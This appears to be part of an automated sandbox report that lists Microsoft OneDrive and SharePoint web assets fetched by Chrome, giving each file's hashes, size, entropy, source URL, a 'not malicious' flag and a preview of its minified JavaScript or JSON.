                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[24],{6521:function(e,t,n){n.d(t,{a:function(){return a}});var a="-2147024860, Microsoft.SharePoint.SPQueryThrottledException"}.,5193:function(e,t,n){n.d(t,{a:function(){return y}});var a=n("tslib_538"),i=n(20),r=n(31),o=n(37),s=n(141),c=n(140),d=n(7),l=n(27),u=n(1686),f=n(264),p=n(25),m=n(10),_=n(68),h=n(116),b=n("odsp.util_517"),g=n(119);function v(e){var t=this,n=new l.a(e.endpoint).authority;return function(i){return(0,a.yv)(t,void 0,void 0,function(){var t,r,o,s,u,v,y,S,D,I,x;return(0,a.SO)(this,function(a){switch(a.label){case 0:return t=c.a.serialize({tenantRootUrl:n}),r={endpoint:e.endpoint,tenantRootUrl:n},o=new m.a({name:"GetMyOneDriveUrl.UserOneDriveEndpoint",extraData:r}),b.x9.isActivated("810CC8F7-AE82-42B8-8625-6D144C4336AD")?[3,2]:[4,i((0,g.a)(function(e){return{spItem:e.demandItemFacet(d.a,t,{suppressGetItems:!1}),error:e.demandItemFacet(_.b,t,{suppressGetItems:!0})}}))];case 1:return S=a.sent(
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (6126)
                                                            Category:downloaded
                                                            Size (bytes):35142
                                                            Entropy (8bit):5.4427637848510155
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:1409578C2AE836E695F2F03CAC9DBF5C
                                                            SHA1:1745FE9C7A7FC8A35CD8E2A7E19F6FF64A14862C
                                                            SHA-256:0B5DFB3C79062380FE6B3D6AE63C484ADF67868121606306E25020C68DB28E49
                                                            SHA-512:D2F7B5D20D5D73730334CF1A730341F2A30A6046107BDC05DE2A72EAAC92E1DEC8D133046CACDAAC71FAE63D907EA33D09276A7A89242F26FAFADE79728E4701
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/1765.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1765],{3066:function(e,t,n){var a=this&&this.__createBinding||(Object.create?function(e,t,n,a){void 0===a&&(a=n),Object.defineProperty(e,a,{enumerable:!0,get:function(){return t[n]}})}:function(e,t,n,a){void 0===a&&(a=n),e[a]=t[n]}),i=this&&this.__exportStar||function(e,t){for(var n in e)"default"===n||Object.prototype.hasOwnProperty.call(t,n)||a(t,e,n)};Object.defineProperty(t,"__esModule",{value:!0}),t.IFloodgateHostPlatform=t.GovernedChannelType=t.ICampaignDefinitions=t.Api=void 0,i(n(2832),t),t.Api=n(2832),i(n(4736),t),i(n(7001),t),i(n(3245),t);var r=n(7003);Object.defineProperty(t,"ICampaignDefinitions",{enumerable:!0,get:function(){return r.ICampaignDefinitions}});var o=n(4739);Object.defineProperty(t,"GovernedChannelType",{enumerable:!0,get:function(){return o.GovernedChannelType}}),i(n(7004),t);var s=n(5602);Object.defineProperty(t,"IFloodgateHostPlatform",{enumerable:!0,get:function(){return s.IFlood
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (42596)
                                                            Category:downloaded
                                                            Size (bytes):78263
                                                            Entropy (8bit):5.432634361639401
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:B220B5721C89C715001177F96ACF9E79
                                                            SHA1:DEBF30C83C1D5FEBF68BE12A0F201A3C8DE6E8AC
                                                            SHA-256:A25770E0D6CB431939879565BB0BBBBD7A0EECEB2BE4A3936844907650FE5454
                                                            SHA-512:90B2BA3DE1B63C8983D625A1E5A912B7C3ABA84A0DB4E3B127CDBCFE5328264C485079D42988B78E53D35EEC63F9E1B1A9B7EA0A18DEA42386E1FB8E085356CF
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/1334.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1334,1551,452],{2652:function(e,t,n){n.d(t,{a:function(){return r}});var a=n("react-lib"),i=n(167);function r(e,t,n){var r=a.useState(t),o=r[0],s=r[1],c=(0,i.a)(void 0!==e),d=c?e:o,l=a.useRef(d),u=a.useRef(n);a.useEffect(function(){l.current=d,u.current=n});var f=(0,i.a)(function(){return function(e,t){var n="function"==typeof e?e(l.current):e;u.current&&u.current(t,n),c||s(n)}});return[d,f]}}.,2983:function(e,t,n){n.d(t,{a:function(){return D}});var a=n("react-lib"),i=n(2950),r=n(2801),o=n(1910),s=n(2738),c=n(1612),d=n(289),l=n("fui.core_220"),u=n(2011),f=n(143),p=n(142);const m=(0,l.ir4)("r2i81i2","rofhmb8",{r:[".r2i81i2{align-items:flex-start;box-sizing:border-box;display:inline-flex;position:relative;}",".r2i81i2:focus{outline-style:none;}",".r2i81i2:focus-visible{outline-style:none;}",".r2i81i2[data-fui-focus-within]:focus-within{border-top-color:transparent;border-right-color:transparent;border-bottom-c
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (7060)
                                                            Category:downloaded
                                                            Size (bytes):8540
                                                            Entropy (8bit):5.2983304308936745
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:57ECA6FD074D8D50F5A4C76D61B15DED
                                                            SHA1:F38423873958EE85BA817FFEE8E94D042DDB7266
                                                            SHA-256:2F2C8616195796A25D59ED90AD3C37E3B990940FD8D59935535B6A36EC232D92
                                                            SHA-512:8D7F9CB451E9E8C1041164A02932891CC853DF9004D086AA0054EDE9DC9070E0186DE94373AF544B509BAF71252CBFF463732C1FE808798D167A05A2F8A8E5A6
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/2.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[2],{9097:function(e,t,n){n.d(t,{a:function(){return E}});var a=n(40),i=n("tslib_538"),r=n("react-lib"),o=n(29),s=n(147),c=n(9098),d=n(5227),l=n(197),u=n(131),f=n(994),p=n("fui.util_261"),m=n(468),_=n(4132),h=(0,o.a)(),b=r.createElement(_.a,null).type,g=function(e){function t(t){var n=e.call(this,t)||this;return(0,u.a)(n),(0,f.a)("DialogContent",t,{titleId:"titleProps.id"}),n}return(0,i.e2)(t,e),t.prototype.render=function(){var e,t=this.props,n=t.showCloseButton,a=t.className,o=t.closeButtonAriaLabel,s=t.onDismiss,d=t.subTextId,l=t.subText,u=t.titleProps,f=void 0===u?{}:u,_=t.titleId,b=t.title,g=t.type,v=t.styles,y=t.theme,S=t.draggableHeaderClassName,D=h(v,{theme:y,className:a,isLargeHeader:g===c.a.largeHeader,isClose:g===c.a.close,draggableHeaderClassName:S}),I=this._groupChildren();return l&&(e=r.createElement("p",{className:D.subText,id:d},l)),r.createElement("div",{className:D.content},r.createElement("d
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (41513)
                                                            Category:downloaded
                                                            Size (bytes):146175
                                                            Entropy (8bit):5.55998177387354
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:C5D37B7A41E0C25B636753250E3A512C
                                                            SHA1:0594B8EBA812CAB69F180F7C18F439199796CCBD
                                                            SHA-256:47231F3ADD94AF658B33EEF188A0B37A714863488D80FE8AA3E54E6C9D315CA1
                                                            SHA-512:5B046DBC9D27A0483ADFD3FE19DE7F0040C3FF5E6146AAA3BE5432D593FCA68453B5567654288954662F46A310F93A16EF03A23F9A9B35BC575FDE90797B14A6
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://shell.cdn.office.net/api/ShellBootstrapper/business/OneShell
                                                            Preview://BuildVersion 1.20250109.6.0.var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_bootstrapper_start"),function(){var e,t,n,a,r={8763:function(e){e.exports="data:font/woff;charset=utf-8;base64,d09GRgABAAAAAAmoAA4AAAAAExwAA5R8AAAAAAAAAAAAAAAAAAAAAAAAAABPUy8yAAABRAAAAEgAAABgMWd7ZGNtYXAAAAGMAAAAPQAAAVLnkt3NY3Z0IAAAAcwAAAAgAAAAKgnZCa9mcGdtAAAB7AAAAPAAAAFZ/J7mjmdhc3AAAALcAAAADAAAAAwACAAbZ2x5ZgAAAugAAAGhAAADZMkacS9oZWFkAAAEjAAAADIAAAA2AQjyc2hoZWEAAATAAAAAFQAAACQQAQgDaG10eAAABNgAAAAMAAAADA0qASZsb2NhAAAE5AAAAAoAAAAKAiQA2G1heHAAAATwAAAAHQAAACAAIgIObmFtZQAABRAAAAP4AAAJ+pGb8VNwb3N0AAAJCAAAABQAAAAg/1EAe3ByZXAAAAkcAAAAiQAAANN4vfIOeJxjYGH3YpzAwMrAwDqL1ZiBgVEaQjNfZEhjEuJgZeViZGIEAwYgEGBAAN9gBQUGh+eKXx5wgPkQkgGsjgXCU2BgAADOIQhyeJxjYGBgZoBgGQZGBhDwAfIYwXwWBgMgzQGETAwMzxWfV3958P8/giXxUKKNWxmqCwwY2RhGPAAA9FQPGwAAAHicY9BiCGUoYGhgWMXIwNjA7MB4gMEBiwgQAACqHAeVeJxdj79Ow0AM
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):6615167
                                                            Entropy (8bit):5.935492554719067
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:1835C16D4A678494F650A94587AF0316
                                                            SHA1:C16874C2F73666AA1FCF4E743141AFC7131E9FA8
                                                            SHA-256:F3DA8A41E4536632FF0B1858B95BE98156FAF70FAB8402A1165985C5167730C4
                                                            SHA-512:948C471A5274EF424CC9C2ED243240EE68AD763E0B711FC82244622A3BBE6D7EE98DE5CC3751486AA3EEA47C1BBE28BD00E5DFF567FC70011F262653F2DA690E
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://timecusa-my.sharepoint.com/_layouts/15/SPComponentRegistry.ashx?projects=[%22STS%22]&languages=%5B%5D
                                                            Preview:{"sts":{"en-US":{"SPLIST":{"scriptPathData":{"aria-mini":"aria-mini-b1d3eb2e","customformatter-mini":"customformatter-mini-fcd00133","customformatter-mini.resx":"en-us/customformatter-mini.resx-3573f52d","roostereditor-mini":"roostereditor-mini-4998463d","roostereditor-mini.resx":"en-us/roostereditor-mini.resx-cb522433","spectreviewer-mini":"spectreviewer-mini-ce4e101e","babylonjs-mini":"babylonjs-mini-2fecff8d","reactandknockout-mini":"reactandknockout-mini-38b94816","listviewdataprefetch-mini":"listviewdataprefetch-mini-2f73ea81","splistreactcontrolsdeferred-mini":"splistreactcontrolsdeferred-mini-7a71c298","splistreactcontrolsdeferred-mini.resx":"en-us/splistreactcontrolsdeferred-mini.resx-9f5d2dc4","splistreactcontrolsbeforeplt-mini":"splistreactcontrolsbeforeplt-mini-04fb8d49","splistreactcontrolsbeforeplt-mini.resx":"en-us/splistreactcontrolsbeforeplt-mini.resx-ed5726fd","splistapp-mini":"splistapp-mini-27747d47","splistapp-mini.resx":"en-us/splistapp-mini.resx-50f4529c","splistf
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (59425)
                                                            Category:dropped
                                                            Size (bytes):64758
                                                            Entropy (8bit):5.27301523819275
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:5238C6C5C1CBD7F3EB1095E46AD72D30
                                                            SHA1:DAD44C1B0E5F936A92771EFD231A20D0D9C79D41
                                                            SHA-256:73AF98C00BFBC6937101E8E207DCDD7F7564FAB05F844FBE31011C9913B17284
                                                            SHA-512:BEA24037905D288064C85922CF2D347C4174BD7AC85A49BB3D997284B7D9D0F56CC0BA723D2C56EB40A304A6210F67042432F9F353E024C01D13514DAA13158B
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:/*! For license information please see odsp.knockout.lib-447adea9.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.knockout.lib"],{"knockout-projections-lib":function(e,t,n){var a,i,r;!function(o){"use strict";function s(e,t,n,a,i,r,o){this.inputItem=t,this.stateArrayIndex=n,this.mappingOptions=i,this.arrayOfState=r,this.outputObservableArray=o,this.outputArray=this.outputObservableArray.peek(),this.isIncluded=null,this.suppressNotification=!1,this.outputArrayIndex=e.observable(a),this.disposeFuncFromMostRecentMapping=null,this.mappedValueComputed=e.computed(this.mappingEvaluator,this),this.mappedValueComputed.subscribe(this.onMappingResultChanged,this),this.previousMappedValue=this.mappedValueComputed.peek()}function c(e,t){if(!e)return null;switch(e.status){case"added":return e.index;case"deleted":return e.index+t;default:throw new Error("Unknown diff status: "+e.status)}}function d(e,t,n,a,i,r,o,c,d){var l="number"==typeof t.moved,u=l?n[t.move
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (12513)
                                                            Category:downloaded
                                                            Size (bytes):14723
                                                            Entropy (8bit):5.405873705521388
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:B33A564FF8CF7AF0662926BDED8EA491
                                                            SHA1:533A2EC4C728D0B2E54438CA0B57CBA097045305
                                                            SHA-256:891228A810B6BF684299C374E87263AE3BD581F29D536E6FC92943ACA5073E8B
                                                            SHA-512:83A3883196B766207A6A46241289E03FA49796B5F24B68EA6659D77F2CF96F6B83DFADA31E4A50B48FFECE825980B63E555374E3B4D5124DDA9000FBB5EDD93A
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/7.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[7],{2779:function(e,t,n){n.d(t,{a:function(){return r},b:function(){return o}});var a=n("react-lib");const i=a.createContext(void 0),r=i.Provider,o=()=>a.useContext(i)}.,2950:function(e,t,n){n.d(t,{a:function(){return r},b:function(){return i}});var a=n(2779);function i(e,t){return r((0,a.b)(),e,t)}function r(e,t,n){if(!e)return t;t={...t};const{generatedControlId:a,hintId:i,labelFor:r,labelId:o,required:s,validationMessageId:c,validationState:d}=e;var l,u,f,p,m,_,h,b,g,v,y,S;return a&&(null!==(u=(l=t).id)&&void 0!==u||(l.id=a)),!o||(null==n?void 0:n.supportsLabelFor)&&r===t.id||null!==(p=(f=t)["aria-labelledby"])&&void 0!==p||(f["aria-labelledby"]=o),(c||i)&&(t["aria-describedby"]=[c,i,null==t?void 0:t["aria-describedby"]].filter(Boolean).join(" ")),"error"===d&&(null!==(_=(m=t)["aria-invalid"])&&void 0!==_||(m["aria-invalid"]=!0)),s&&((null==n?void 0:n.supportsRequired)?null!==(b=(h=t).required)&&void 0!==b
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (22635)
                                                            Category:downloaded
                                                            Size (bytes):56659
                                                            Entropy (8bit):5.4956945343396
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:0759A01B287E49E87BBF9AE45E744ED9
                                                            SHA1:6C474FDA275F2147612D4B853536AC08B43B0AE5
                                                            SHA-256:FB11783C943FD3F1EBE22D8BF1E0AD4D66DFD96C05C77749F1378142024E256C
                                                            SHA-512:F46095FD51001B545B2FE20B4F4F903FBF7ECD2150673158D99C45F7677F408F6CB20BD635EB584DC148FDB141B589A785E7DB0F9392CECDADBDB2C18AD9280E
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/102.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[102],{4506:function(e,t,n){function a(e){return e&&e.webAbsoluteUrl===e.siteAbsoluteUrl}n.d(t,{a:function(){return a}})}.,3810:function(e,t,n){function a(e){var t=e.path,n=e.parentLink,a=e.filename,r=e.isContainer,o=e.shouldAllowDisplayFormUrl;if(!n||!a)return t;var s=t,c=i(n),d=r&&a&&t&&(t.indexOf(a)<0||t.indexOf(c)<0)&&-1===t.toLowerCase().indexOf("docsethome.aspx");return(!t||!o&&t.indexOf("/Forms/DispForm.aspx?ID=")>=0||d)&&(s="".concat(c,"/").concat(a)),s}function i(e){return e?e.replace(/\/Forms\/[^\/]*\.aspx$/i,"").replace(/\/[^\/]*\.aspx$/i,""):e}n.d(t,{a:function(){return i},b:function(){return a}})}.,9155:function(e,t,n){n.d(t,{a:function(){return O}});var a=n("tslib_538"),i=n(332),r=n(59),o=n("fui.util_261"),s=n(217),c=n("odsp.util_517"),d=n(1015),l=n(1843),u=n(911),f=n(69),p=n(55),m=n(1553),_=n(10),h=n(56),b=["teams","sites","personal"],g="<scrubbed>",v="unknown";function y(e){if("/"===e.charAt(0)
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (12381)
                                                            Category:dropped
                                                            Size (bytes):27973
                                                            Entropy (8bit):5.484958883709077
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:2BAAAD65C1CC0057281EF7295DDCD1FC
                                                            SHA1:82BB869FC66D1989E0E9F5331197BE9C30AFCF60
                                                            SHA-256:6C3FCC48BAF9351432027313C42B07D48E639FA93FE40F7BDE7083EBB69A5536
                                                            SHA-512:1E807B67070684F6FEF984AF69380F506626989578DE6A50884A4381F4EF9FB6767415B43FBE21CA4758C12C1B5578E77B3DC1D869ACD0275C1D9F83D877CD7A
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[8],{3860:function(e,t,n){n.d(t,{a:function(){return I}});var a=n("react-lib"),i=n(143),r=n(142),o=n(2950),s=n(2779),c=n(2571);const d=(0,c.a)("ErrorCircle12Filled","12",["M6 11A5 5 0 1 0 6 1a5 5 0 0 0 0 10Zm-.75-2.75a.75.75 0 1 1 1.5 0 .75.75 0 0 1-1.5 0Zm.26-4.84a.5.5 0 0 1 .98 0l.01.09v2.59a.5.5 0 0 1-1 0V3.41Z"]),l=(0,c.a)("Warning12Filled","12",["M5.21 1.46a.9.9 0 0 1 1.58 0l4.09 7.17a.92.92 0 0 1-.79 1.37H1.91a.92.92 0 0 1-.79-1.37l4.1-7.17ZM5.5 4.5v1a.5.5 0 0 0 1 0v-1a.5.5 0 0 0-1 0ZM6 6.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"]),u=(0,c.a)("CheckmarkCircle12Filled","12",["M1 6a5 5 0 1 1 10 0A5 5 0 0 1 1 6Zm7.35-.9a.5.5 0 1 0-.7-.7L5.5 6.54 4.35 5.4a.5.5 0 1 0-.7.7l1.5 1.5c.2.2.5.2.7 0l2.5-2.5Z"]);var f=n(1910),p=n(289),m=n("fui.core_220"),_=n(162);const h={error:a.createElement(d,null),warning:a.createElement(l,null),success:a.createElement(u,null),none:void 0},b=(0,m.Oz8)({base:{mc9l5x:"f13qh94s"},hor
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):3287
                                                            Entropy (8bit):5.143820589437153
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:880DF845FCE01E60176857D5C0965CC3
                                                            SHA1:F9EB2AAE93D8A4C0C52AE835B47C5148FC8092E8
                                                            SHA-256:8DFC6D455239FB013C5005CEE8FA3052BD2C4B79028779893C458C4A4B1B08D9
                                                            SHA-512:DD0937857FA0B5FE533579D13F90303495232B61CB2435CE1CD852D0C207BA27ACE48DCB3D7CFD2736D1CF1361D395BF79DB5E7E694233B76A210CA4E14DF44A
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:{"Floodgate_Campaign_OneDrive.be998278-ae33-41a3-a032-f8020d1a9379":{"CampaignId":"be998278-ae33-41a3-a032-f8020d1a9379","GovernedChannelType":0,"NominationScheme":{"Type":0,"PercentageNumerator":7,"PercentageDenominator":100,"FallbackSurveyDurationSeconds":0,"NominationPeriod":{"Type":0,"IntervalSeconds":2592000},"CooldownPeriod":{"Type":0,"IntervalSeconds":7776000}},"SurveyTemplate":{"Type":4,"ActivationEvent":{"Type":1,"Sequence":[{"Type":0,"Activity":"MeaningfulNpsAction","Count":1,"IsAggregate":true}]},"UxSchema":{"variables":{},"pages":[{"id":"51e6db44-1070-45e6-be30-8c14a5b9e55a","displayName":"Horizontal Rating","questions":[{"id":"rating1","type":"Rating","questionLabel":"How likely are you to recommend the web version of OneDrive to others, if asked?","required":true,"visible":true,"ratingValues":["1","2","3","4","5"],"leftLegendValue":"Very unlikely","rightLegendValue":"Very Likely"}],"title":"Microsoft would love your perspective","isFinalPage":false},{"id":"b8d2ac03-6669-4
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text
                                                            Category:downloaded
                                                            Size (bytes):286
                                                            Entropy (8bit):5.082278988130342
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A558E19FC4F0A768BC2EE6D7D3C5F749
                                                            SHA1:A86A966CC7C443726FECF3757ACA4D75A8CD9544
                                                            SHA-256:F43BF6EAE1F786E1657F0B50F6C9668501F9DF98AF99D2CB6A1AB3F2B83880F3
                                                            SHA-512:88E3407E187EC2C1AB8573E8BFAC9252D1EDD89E80373AB7FAAB51C9FDFBDD68E56C01A36116F71944F0C1638DA67379C9A0CF0A4B5E1A7E21650A75EF56D1C3
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/1107.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1107],{7323:function(e,t,n){n.r(t),n.d(t,{renderOpenAsShortcutAction:function(){return s}});var a=n("react-lib"),i=n(1760),r=n(9),o=(0,r.f)()((0,r.d)()(i.a)),s=function(){return a.createElement(o,null)}}.}]);
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):72
                                                            Entropy (8bit):4.241202481433726
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:9E576E34B18E986347909C29AE6A82C6
                                                            SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                            SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                            SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (4824)
                                                            Category:dropped
                                                            Size (bytes):21685
                                                            Entropy (8bit):5.436763297845945
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:2A81F328095D3945ABE29982FC2E13C1
                                                            SHA1:98312775D9834871F561F53AF51B6FB19F19A4D5
                                                            SHA-256:385A45994CF0FC285019DCD82F7EF11E343FCC97C40B08CC4D7CBB468F4812BC
                                                            SHA-512:4688E2FBB8F29394E5CCBD8B69F6FE2CB9BF128AEB68AF5745F34AB92C69C3FCDD8B3266C6F05BE01543FED40CDC6F2E0AB978722CCB49A3016635F9911F221B
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[16],{9011:function(e,t,n){n.d(t,{b:function(){return f},a:function(){return p},c:function(){return u}});var a=n("tslib_538"),i=n(7),r=n(57),o=n(9012),s=n(5),c=n(9014),d=n(100),l=n(928);function u(e){var t=e.webAbsoluteUrl,n=e.listFullUrl,a=e.rootFolder;if(a){var i=function(e,t){var n=void 0;if(t){var a=(0,c.a)(t,e),i=new d.default(e).path;a>-1&&(n=t.substring(0,a))===i&&(n="")}return n}(n,a);if(void 0!==i)return{webAbsoluteUrl:t,listFullUrl:n,itemId:"",rootFolder:i}}}function f(e){var t=e.parentKey,n=e.serverData,c=e.pageContext;return function(e){for(var d,p,m=t,_=new r.a({publisher:f});m;){var h=(0,o.a)({key:m,listData:n,pageContext:c}),b=u(m),g=i.a.serialize(m);_.merge(e((0,l.a)({itemKey:g,spItem:m,driveUrl:null===(p=n.ListSchema)||void 0===p?void 0:p[".driveUrl"]})).itemResolver),_.resolveItems({items:(d={},d[g]=(0,a.q5)((0,a.q5)({},h?s.m.pack(h):{}),b?s.G.pack({itemKey:i.a.serialize(b)}):{}),d)}),m=b}ret
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (53652)
                                                            Category:downloaded
                                                            Size (bytes):76808
                                                            Entropy (8bit):5.336675866325532
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:CF38F8612728261982892D0455F8F9E0
                                                            SHA1:6130EE8EDACCB74DF4A5CA8C45918B439CB73AFB
                                                            SHA-256:BC5A7521ABD4A42A480E2EFCC0B101B4B05D2FC01EB3A68CA43ECAD47B3CFE8F
                                                            SHA-512:C7CF4E0EC90F40659AA87CD92F30367E091340C2ED07A99FE48D042DBBD9A7524944DB4DA858C1D963D06C3796D43FAA5DEDBBB5E19E2B62BC9870EF31F119DD
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/523.js
                                                            Preview:/*! For license information please see 523.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[523],{9920:function(e,t,n){n.d(t,{A:function(){return k},B:function(){return $},C:function(){return J},D:function(){return de},E:function(){return se},F:function(){return ce},G:function(){return ne},H:function(){return T},I:function(){return M},J:function(){return P},K:function(){return q},L:function(){return oe},M:function(){return V},a:function(){return z},b:function(){return G},c:function(){return K},d:function(){return W},e:function(){return ee},f:function(){return Z},g:function(){return ie},h:function(){return te},i:function(){return ae},j:function(){return w},k:function(){return F},l:function(){return B},m:function(){return U},n:function(){return H},o:function(){return A},p:function(){return O},q:function(){return C},r:function(){return N},s:function(){return E},t:function(){return R},u:function(){return re},v:function(){return I},w:function()
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (18801)
                                                            Category:dropped
                                                            Size (bytes):62643
                                                            Entropy (8bit):5.0402765422641975
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:EB83330216AD558964C59817C85819CF
                                                            SHA1:E98AE88FD16B68CCE9BD627D09B572E5B72D2898
                                                            SHA-256:131C2992FCE1ED63DEEF3480CBCB0922DF91389337A1FFEBA1CF4261EE0E65A4
                                                            SHA-512:1E0D72867127375877677E9877F37678FA29A87C2BF7A3628A0787E762409D7EA8E681AF5E190FD09CA08F8B53912B12E61651A509BF11ED47A692EDD965B525
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{1093:function(e){e.exports=JSON.parse('{"l":"Copilot","m":"Show Copilot actions for selected items","O":"Summarize","t":"Custom Prompt","a":"Add a custom prompt","g":"Clear custom prompt(s)","Q":"Summarize \\u0022{0}\\u0022","P":"Summarize these files","h":"Compare files","i":"Compare the differences between these files and put them in a table view","n":"Create an FAQ","o":"Create an FAQ from \\u0022{0}\\u0022","p":"Create a podcast","q":"Create a podcast from \\u0022{0}\\u0022","f":"Ask a question","S":"Get insights on multiple files with Copilot","R":"Quickly summarize, compare, and get answers from multiple files without opening them.","N":"Summarize files","C":"Got it","G":"Outline main ideas","I":"Create a table view summarizing the key themes of this folder","H":"Create a table view summarizing the key themes of these folders","F":"Open in the side pane","r":"Convert to a presentation",
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (4551), with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):4551
                                                            Entropy (8bit):5.389564111731932
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D845C7CFDF504D17DD1A01BC3F58D0E9
                                                            SHA1:4BF62628612111A63DED2B04639BCF918D0C4EB9
                                                            SHA-256:8FFBAC41E6195332D893B04AA93F305DDA63CC5317EE6D89E4D177CCCDE72240
                                                            SHA-512:3398BB9E265849D4A0B67047D9AC47DDA235DF7261BC95B9B8D0B4F7575C7E06C312592CE76C8CDA1C7109866B0F2A128D3161C99785C3EC872956BD432B75D7
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://r4.res.office365.com/footprint/v3.2/scripts/fp-min.js
